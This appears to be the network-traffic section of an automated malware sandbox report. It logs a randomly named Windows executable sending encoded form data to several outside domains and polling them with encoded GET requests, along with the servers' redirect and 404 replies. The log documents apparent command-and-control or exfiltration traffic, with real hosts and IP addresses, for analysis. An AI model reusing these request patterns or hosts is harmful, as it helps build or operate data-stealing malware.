                                                                                                              Data Raw: 51 32 5f 34 3d 48 76 51 4b 54 6e 79 36 6e 64 62 42 38 77 68 72 59 38 35 30 67 63 51 77 36 38 65 67 6a 39 32 6d 74 73 53 52 73 69 78 46 64 62 52 61 6a 41 52 2f 72 46 4d 2b 51 79 6b 61 75 43 74 6c 6c 4b 69 76 49 75 34 4d 41 6f 4f 46 52 79 43 4b 4b 2b 62 76 57 53 77 34 48 50 39 73 68 6a 41 64 74 72 30 73 2b 72 6b 2b 4f 78 53 48 2f 61 30 50 4c 73 67 67 49 4f 64 39 44 71 66 69 73 43 54 67 54 38 34 2f 48 58 5a 79 70 47 41 66 54 77 4d 4e 6b 41 32 33 4f 59 41 30 6f 5a 57 72 34 59 70 52 78 74 30 43 38 66 32 68 31 52 44 58 72 6b 4c 31 6a 49 72 79 64 58 62 78 44 46 32 62 65 6b 37 69 57 51 62 53 61 67 3d 3d
                                                                                                              Data Ascii: Q2_4=HvQKTny6ndbB8whrY850gcQw68egj92mtsSRsixFdbRajAR/rFM+QykauCtllKivIu4MAoOFRyCKK+bvWSw4HP9shjAdtr0s+rk+OxSH/a0PLsggIOd9DqfisCTgT84/HXZypGAfTwMNkA23OYA0oZWr4YpRxt0C8f2h1RDXrkL1jIrydXbxDF2bek7iWQbSag==


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              42192.168.11.204978313.248.169.48804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:36:47.011559963 CET743OUTPOST /zut6/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.notepad.mobi
                                                                                                              Origin: http://www.notepad.mobi
                                                                                                              Referer: http://www.notepad.mobi/zut6/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 48 76 51 4b 54 6e 79 36 6e 64 62 42 75 42 52 72 5a 61 78 30 6d 38 51 2f 6d 73 65 67 78 39 33 4f 74 73 65 52 73 6a 46 73 63 74 70 61 69 69 35 2f 6f 41 67 2b 52 79 6b 61 6b 69 74 67 39 71 69 6b 49 75 31 37 41 74 75 46 52 78 2b 4b 4b 2f 72 76 57 42 49 6e 45 2f 39 75 39 6a 41 6c 6e 4c 30 73 2b 72 6b 2b 4f 78 57 70 2f 61 73 50 4b 66 34 67 4b 72 78 36 63 61 66 6c 37 79 54 67 45 73 34 37 48 58 5a 41 70 44 70 43 54 79 30 4e 6b 42 6d 33 4f 73 30 7a 69 5a 57 58 32 34 6f 30 69 74 63 4f 39 39 36 6a 35 57 7a 51 7a 6e 44 65 72 2b 36 6f 41 6c 76 56 41 57 71 70 61 55 43 4b 55 53 61 4a 48 6f 5a 76 62 31 59 41 43 50 32 33 58 68 78 41 61 35 2b 6f 49 30 38 3d
                                                                                                              Data Ascii: Q2_4=HvQKTny6ndbBuBRrZax0m8Q/msegx93OtseRsjFsctpaii5/oAg+Rykakitg9qikIu17AtuFRx+KK/rvWBInE/9u9jAlnL0s+rk+OxWp/asPKf4gKrx6cafl7yTgEs47HXZApDpCTy0NkBm3Os0ziZWX24o0itcO996j5WzQznDer+6oAlvVAWqpaUCKUSaJHoZvb1YACP23XhxAa5+oI08=


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              43192.168.11.204978413.248.169.48804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:36:49.650089025 CET6445OUTPOST /zut6/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.notepad.mobi
                                                                                                              Origin: http://www.notepad.mobi
                                                                                                              Referer: http://www.notepad.mobi/zut6/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 48 76 51 4b 54 6e 79 36 6e 64 62 42 75 42 52 72 5a 61 78 30 6d 38 51 2f 6d 73 65 67 78 39 33 4f 74 73 65 52 73 6a 46 73 63 74 68 61 69 54 5a 2f 72 6a 34 2b 53 79 6b 61 36 79 74 68 39 71 69 44 49 71 52 2f 41 74 79 2f 52 33 79 4b 49 64 6a 76 48 41 49 6e 66 50 39 75 32 44 41 65 74 72 30 44 2b 6f 63 36 4f 78 47 70 2f 61 73 50 4b 61 30 67 4f 2b 64 36 65 61 66 69 73 43 54 6e 54 38 34 54 48 57 78 71 70 44 74 53 54 68 38 4e 6c 68 57 33 64 2f 63 7a 2f 4a 57 56 78 34 6f 57 69 74 42 51 39 2b 50 53 35 57 76 36 7a 6b 7a 65 70 37 2f 55 63 57 7a 51 65 30 76 68 5a 56 71 57 56 51 43 35 59 6f 70 71 58 6c 63 55 4c 76 6d 76 53 52 35 42 4b 6f 75 71 57 51 55 36 47 41 51 4d 43 6e 39 48 55 4f 63 78 4f 33 35 76 49 6f 4c 4c 43 6e 6a 69 44 58 71 78 4a 33 74 62 64 62 64 50 7a 63 53 77 33 44 6b 52 6b 37 6d 49 51 4d 53 6f 76 38 38 73 49 5a 47 76 30 69 4c 30 5a 6c 6c 4d 62 6f 64 47 4c 6f 7a 4c 4e 66 34 6c 6b 4f 4d 65 39 79 7a 44 39 34 51 38 31 30 36 32 6a 76 35 4b 74 6b 33 30 63 71 52 79 34 39 6f 56 41 33 48 57 41 [TRUNCATED]
                                                                                                              Data Ascii: Q2_4=HvQKTny6ndbBuBRrZax0m8Q/msegx93OtseRsjFscthaiTZ/rj4+Syka6yth9qiDIqR/Aty/R3yKIdjvHAInfP9u2DAetr0D+oc6OxGp/asPKa0gO+d6eafisCTnT84THWxqpDtSTh8NlhW3d/cz/JWVx4oWitBQ9+PS5Wv6zkzep7/UcWzQe0vhZVqWVQC5YopqXlcULvmvSR5BKouqWQU6GAQMCn9HUOcxO35vIoLLCnjiDXqxJ3tbdbdPzcSw3DkRk7mIQMSov88sIZGv0iL0ZllMbodGLozLNf4lkOMe9yzD94Q81062jv5Ktk30cqRy49oVA3HWAPtMDIDUU+w7bd18zx3rfaVAl4216tg/UdW9ZY7sAxzEePFKtuj+Jsc9CbnZi0nXo4RumA5MqjOZJVY4cMc2XhM6zzL7fVN6TgLcj4vJi2tLka9dQrlihvui/taQOWAH/cR0+VZkQOpzsDuHD5E3UbJygvL46ze7XZOZvcYoNnj/Q35O96YjT9hdeRnQgnNzwK0yDMWie3an0K7j8V3tCu+4hQh4Ozzc0wG/6nehoQCALhZd0nz0i4x8oOyApWviA4ae8uUNXulV10Hy0XQBBo9lXz8bvciOXMJM/gqRhVAwG+leW1PYSDV90eg5yoQGfuAFf417hYgd/3R44Gw022Akixjh9xDQpdhSdSqpbPSL//og5lLMY+ANCfXDu3AElWEngPaCYKMnDeeLkGlhOwIWIrmSV0jAwblFHMP+i0KRh+J0ud6fZLeKdnLTyS5oI5Z3KOmT5XyOtbhCbACsEA5RH3gLu2OS+pe2zA/126u4HGopOTvff/Vrv+G4JG3tTnVZtTwK0Bxd5igOZFRvUJCBekZozOJZ5VrpVhMhE9orkAi7JdeVQU7weCyePRzWSBW+7oOfSGwCBjq7C4FKHvpoI8iTFhblcbKGnAaHPTkwJibC1fWtvvvtqDJdbm4xZSWzmMor554eAw78XbdgXYMkQLgMST9joRW [TRUNCATED]
                                                                                                              Nov 5, 2024 15:36:49.650146961 CET1447OUTData Raw: 36 59 45 62 75 47 79 6f 4b 70 68 39 74 38 66 38 68 72 61 6d 33 71 78 45 78 55 43 2f 2f 47 77 4d 69 59 42 4e 6e 30 76 50 59 52 4c 31 71 73 51 69 79 4c 39 46 64 50 32 2f 70 68 53 73 56 30 55 65 54 4f 65 42 79 56 51 59 43 75 31 6d 5a 41 74 43 75 4b
                                                                                                              Data Ascii: 6YEbuGyoKph9t8f8hram3qxExUC//GwMiYBNn0vPYRL1qsQiyL9FdP2/phSsV0UeTOeByVQYCu1mZAtCuKn+Tgrj1Ih/kvcGzgERy4NOowuYZpMoSZZ9PvXA5NmKQkxeJrBpjcravcvpZy4yDI9m7n5j0w1X7nsi4Z/aWJHQvs0bPKlUs+ZMtvHNy1cV0xY3m3ESQn49BKhvC1DSZBS0oDaK6wK99oIi1RA6QwrwoZMCuUHQ+Ya


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              44192.168.11.204978513.248.169.48804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:36:52.288631916 CET456OUTGET /zut6/?Q2_4=Kt4qQSLgj4HorxpxZIZ4p+EAwKHWi+XN9OiBuCBJU5cikXkc2Sk5R2gtgSdO+P2tW+5SfoOeVCvwWIOnLXM8QNp6yDsCjrxQ3ZxiPCiDnoMvdK5RCpNRC70=&uXP=1HX8 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.notepad.mobi
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:36:52.399775028 CET389INHTTP/1.1 200 OK
                                                                                                              Server: openresty
                                                                                                              Date: Tue, 05 Nov 2024 14:36:52 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 249
                                                                                                              Connection: close
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 32 5f 34 3d 4b 74 34 71 51 53 4c 67 6a 34 48 6f 72 78 70 78 5a 49 5a 34 70 2b 45 41 77 4b 48 57 69 2b 58 4e 39 4f 69 42 75 43 42 4a 55 35 63 69 6b 58 6b 63 32 53 6b 35 52 32 67 74 67 53 64 4f 2b 50 32 74 57 2b 35 53 66 6f 4f 65 56 43 76 77 57 49 4f 6e 4c 58 4d 38 51 4e 70 36 79 44 73 43 6a 72 78 51 33 5a 78 69 50 43 69 44 6e 6f 4d 76 64 4b 35 52 43 70 4e 52 43 37 30 3d 26 75 58 50 3d 31 48 58 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Q2_4=Kt4qQSLgj4HorxpxZIZ4p+EAwKHWi+XN9OiBuCBJU5cikXkc2Sk5R2gtgSdO+P2tW+5SfoOeVCvwWIOnLXM8QNp6yDsCjrxQ3ZxiPCiDnoMvdK5RCpNRC70=&uXP=1HX8"}</script></head></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              45192.168.11.204978615.197.148.33804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:37:06.821808100 CET717OUTPOST /7sxb/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.hyman.life
                                                                                                              Origin: http://www.hyman.life
                                                                                                              Referer: http://www.hyman.life/7sxb/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 67 50 51 4a 43 2f 74 39 32 63 69 56 33 31 52 72 74 7a 78 6e 43 4f 65 63 49 41 61 63 48 77 6c 62 65 48 74 67 34 57 56 49 59 64 56 63 46 54 47 77 43 6b 49 79 75 64 77 62 6c 6f 66 79 59 75 77 51 6b 46 6c 50 73 6e 4e 6b 62 57 46 37 31 6a 61 74 78 45 32 4e 49 42 57 6f 75 6e 6e 64 7a 41 55 44 70 47 44 33 30 78 30 7a 44 43 42 6f 43 4b 4d 43 6d 75 71 34 4b 59 34 75 33 32 53 2f 42 62 4c 2b 49 59 6b 42 4a 65 38 57 42 66 66 63 71 66 64 2b 79 6b 78 58 52 56 77 56 45 74 4d 51 6b 59 31 4e 72 59 2f 38 58 6e 6a 42 6e 39 78 53 64 51 4e 64 61 70 6a 46 56 73 74 66 55 50 64 6d 64 76 64 7a 6c 51 3d 3d
                                                                                                              Data Ascii: Q2_4=gPQJC/t92ciV31RrtzxnCOecIAacHwlbeHtg4WVIYdVcFTGwCkIyudwblofyYuwQkFlPsnNkbWF71jatxE2NIBWounndzAUDpGD30x0zDCBoCKMCmuq4KY4u32S/BbL+IYkBJe8WBffcqfd+ykxXRVwVEtMQkY1NrY/8XnjBn9xSdQNdapjFVstfUPdmdvdzlQ==


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              46192.168.11.204978715.197.148.33804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:37:09.471915960 CET737OUTPOST /7sxb/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.hyman.life
                                                                                                              Origin: http://www.hyman.life
                                                                                                              Referer: http://www.hyman.life/7sxb/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 67 50 51 4a 43 2f 74 39 32 63 69 56 78 56 42 72 2b 44 4e 6e 41 75 65 66 55 51 61 63 65 67 6b 7a 65 47 52 67 34 55 35 59 5a 75 68 63 45 79 32 77 44 6c 49 79 76 64 77 62 77 59 66 33 48 65 77 5a 6b 46 5a 68 73 6d 78 6b 62 57 52 37 31 6d 2b 74 78 79 2b 53 4a 52 57 71 6e 48 6e 44 39 67 55 44 70 47 44 33 30 78 67 5a 44 43 5a 6f 42 35 6b 43 33 37 57 2f 4a 59 34 74 30 32 53 2f 46 62 4c 69 49 59 6b 6a 4a 61 38 77 42 5a 54 63 71 61 5a 2b 7a 31 78 55 62 56 77 54 41 74 4e 42 67 49 6f 68 71 72 6e 72 64 6b 66 71 70 39 39 39 59 47 63 48 48 62 58 68 57 2f 78 74 51 2f 6b 4f 66 74 63 6f 34 61 55 54 78 76 71 31 73 5a 74 57 65 76 58 2b 51 52 70 57 45 37 49 3d
                                                                                                              Data Ascii: Q2_4=gPQJC/t92ciVxVBr+DNnAuefUQacegkzeGRg4U5YZuhcEy2wDlIyvdwbwYf3HewZkFZhsmxkbWR71m+txy+SJRWqnHnD9gUDpGD30xgZDCZoB5kC37W/JY4t02S/FbLiIYkjJa8wBZTcqaZ+z1xUbVwTAtNBgIohqrnrdkfqp999YGcHHbXhW/xtQ/kOftco4aUTxvq1sZtWevX+QRpWE7I=


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              47192.168.11.204978815.197.148.33804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:37:12.112953901 CET2578OUTPOST /7sxb/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.hyman.life
                                                                                                              Origin: http://www.hyman.life
                                                                                                              Referer: http://www.hyman.life/7sxb/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 67 50 51 4a 43 2f 74 39 32 63 69 56 78 56 42 72 2b 44 4e 6e 41 75 65 66 55 51 61 63 65 67 6b 7a 65 47 52 67 34 55 35 59 5a 76 5a 63 46 41 2b 77 44 47 77 79 73 64 77 62 78 59 66 32 48 65 78 4c 6b 42 4e 6c 73 6d 39 53 62 56 70 37 30 45 32 74 7a 41 57 53 47 52 57 71 6c 48 6e 65 7a 41 55 57 70 47 54 72 30 78 77 5a 44 43 5a 6f 42 2f 59 43 33 75 71 2f 46 34 34 75 33 32 53 37 42 62 4c 65 49 59 38 4a 4a 61 6f 47 42 70 7a 63 71 36 70 2b 77 44 74 55 58 56 77 52 4e 4e 4e 5a 67 49 6b 2b 71 72 72 4e 64 6c 72 4d 70 38 6c 39 55 6a 42 63 59 59 37 2f 4e 76 38 36 62 75 59 53 5a 37 4d 45 6e 4e 64 6d 30 64 2b 4b 6c 4d 5a 78 53 4d 76 65 4d 6b 38 63 5a 72 34 4d 34 34 69 69 2b 52 62 52 78 6d 64 67 79 79 53 49 33 42 38 2f 63 58 68 51 67 42 72 39 4c 2f 71 41 36 39 7a 53 63 31 49 71 4a 77 55 4c 2b 78 5a 49 55 31 47 74 2f 2f 53 46 42 6d 4a 63 62 30 4c 56 74 6f 52 41 79 30 30 2f 62 56 64 6f 64 50 56 4c 66 6f 4c 44 42 71 73 64 72 74 63 48 52 4e 6c 33 47 52 41 35 55 52 79 31 2f 58 41 55 49 41 44 30 2f 70 37 52 53 [TRUNCATED]
                                                                                                              Data Ascii: Q2_4=gPQJC/t92ciVxVBr+DNnAuefUQacegkzeGRg4U5YZvZcFA+wDGwysdwbxYf2HexLkBNlsm9SbVp70E2tzAWSGRWqlHnezAUWpGTr0xwZDCZoB/YC3uq/F44u32S7BbLeIY8JJaoGBpzcq6p+wDtUXVwRNNNZgIk+qrrNdlrMp8l9UjBcYY7/Nv86buYSZ7MEnNdm0d+KlMZxSMveMk8cZr4M44ii+RbRxmdgyySI3B8/cXhQgBr9L/qA69zSc1IqJwUL+xZIU1Gt//SFBmJcb0LVtoRAy00/bVdodPVLfoLDBqsdrtcHRNl3GRA5URy1/XAUIAD0/p7RS90+mPKB15UFUC8XxPu3khekOeTE41XE+yT/gJQrNXash1NV3tppS+IMAwADpgyyz9DWWp65GYL66a//UgTeV8vZDk2eCss9lMlTFSGVnsTsDUdfKsZTOT85JetBjMMhQcPFE7e5apdwaN2CHaOHi8/PKgpw7cwZpd5hZVV6cIJ4nCLWcywA5mdPtu5ZK6BmLTxO0k1K2GauiMePrBuWeZSsqG1XrMHw3L3JOZO+jd7fhdccSVa4y0a7ZmDW+BwgodD2oWzRt4s1MASd0O/BDkvu+JQEzeh7FxxY6Pu3DU0NIZm6OvAHKMtJs136ytFH5XVFRt2XUPCkRdbqKfByUk7I7BW0LVPORZi7CCI+8VoWr33BdEF+Xg38yO+LQdEAvPesXikDWsZZIRNVrmrMBwKNArbMc05SpzIl10GlqpUqkyJ4n+tsl8DtTpLPxyboIHT3SZFVxLZRRa9D18m15gYsPlB3HEJepL0P/yfQgFhqGhs4xfkfgYD2171EUSc2PKi/EAkXhaKsat9dtfWoYL1QfuvknQ4T7J/AZHyM2JjuJbz9aUeWjcFkaSXfUpriQDlZvJu0pnxoN34Nv6+do3JoTn+G04nGidvTdwYyAtUXY9EWkZjL9vqwKcs00K0jIjbdvrbVHlhqn/QwqIbeUozSVM1LgvzO/ay [TRUNCATED]
                                                                                                              Nov 5, 2024 15:37:12.113018990 CET5308OUTData Raw: 78 43 52 6a 65 4d 6d 35 4b 48 50 4d 4d 6a 33 48 38 71 5a 32 39 32 53 41 38 45 39 62 68 34 34 72 6e 46 69 45 6f 62 6a 66 36 6c 73 2b 6f 6a 6c 70 49 37 37 79 45 33 55 47 73 4d 46 64 31 6d 30 75 34 2f 68 59 65 42 72 5a 55 63 6f 50 5a 65 71 74 63 76
                                                                                                              Data Ascii: xCRjeMm5KHPMMj3H8qZ292SA8E9bh44rnFiEobjf6ls+ojlpI77yE3UGsMFd1m0u4/hYeBrZUcoPZeqtcv95aX4J945KmQG8SfFlzNdbVvdbo90SokL6bet6msRoINXTf9KC2TYm0qevXGtQ2CQRJiVyGRcyaQcVQczxhz/kvfFQc+vaEbaxMYKms4p3MRQ4LKxIF9X0W48h20tw4WqMeCcG+vy+e+m9HU7GC+DxLXDjESpx5tg


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              48192.168.11.204978915.197.148.33804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:37:14.749298096 CET454OUTGET /7sxb/?Q2_4=tN4pBPdIy5yR3QdP6gZ8D8aFehGETDFYb1Vi1ndOQOBeKVKVLkgKnsMB8I7daeFpk1t8wQFPQHt0hTDP8VSpMA6XkXbq7RBf6U2uwyI0bQpdefBdwJy0dog=&uXP=1HX8 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.hyman.life
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:37:14.859739065 CET389INHTTP/1.1 200 OK
                                                                                                              Server: openresty
                                                                                                              Date: Tue, 05 Nov 2024 14:37:14 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 249
                                                                                                              Connection: close
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 32 5f 34 3d 74 4e 34 70 42 50 64 49 79 35 79 52 33 51 64 50 36 67 5a 38 44 38 61 46 65 68 47 45 54 44 46 59 62 31 56 69 31 6e 64 4f 51 4f 42 65 4b 56 4b 56 4c 6b 67 4b 6e 73 4d 42 38 49 37 64 61 65 46 70 6b 31 74 38 77 51 46 50 51 48 74 30 68 54 44 50 38 56 53 70 4d 41 36 58 6b 58 62 71 37 52 42 66 36 55 32 75 77 79 49 30 62 51 70 64 65 66 42 64 77 4a 79 30 64 6f 67 3d 26 75 58 50 3d 31 48 58 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Q2_4=tN4pBPdIy5yR3QdP6gZ8D8aFehGETDFYb1Vi1ndOQOBeKVKVLkgKnsMB8I7daeFpk1t8wQFPQHt0hTDP8VSpMA6XkXbq7RBf6U2uwyI0bQpdefBdwJy0dog=&uXP=1HX8"}</script></head></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              49192.168.11.2049790104.21.94.87804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:37:23.054768085 CET457OUTGET /vq3l/?Q2_4=WKR5ld2WiQxHxPDU6pm8hrTzAxfoYD+zNd+jQFHpl4y5z9MlTNWt1pAD28TX6W++2340V0NEzWPPUH5FlugQl+5D7H7BO9/OK4RESnHOQd/yty8pNcZLL2g=&uXP=1HX8 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.nagasl89.baby
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:37:23.683861017 CET1289INHTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:37:23 GMT
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              vary: Accept-Encoding
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gW7nlen7HPIvQqGTE2%2FHmR2ObGDhzVOqzSU6bAtsN1OvXDoX03OtbTVuNnZ2NnUICTJZGUje1ZZujj2d%2FARVz4jN5TFWiS2dTcuIgCGnBPhy7jOvksIGGVpcc3sIzj%2BCP4e%2Bjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8ddd94db683442e2-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=103319&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=457&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                              Data Raw: 32 30 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 69 64 2d 49 44 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 72 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 42 75 6b 61 6e 57 6f 72 64 70 72 65 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 67 61 73 6c 38 [TRUNCATED]
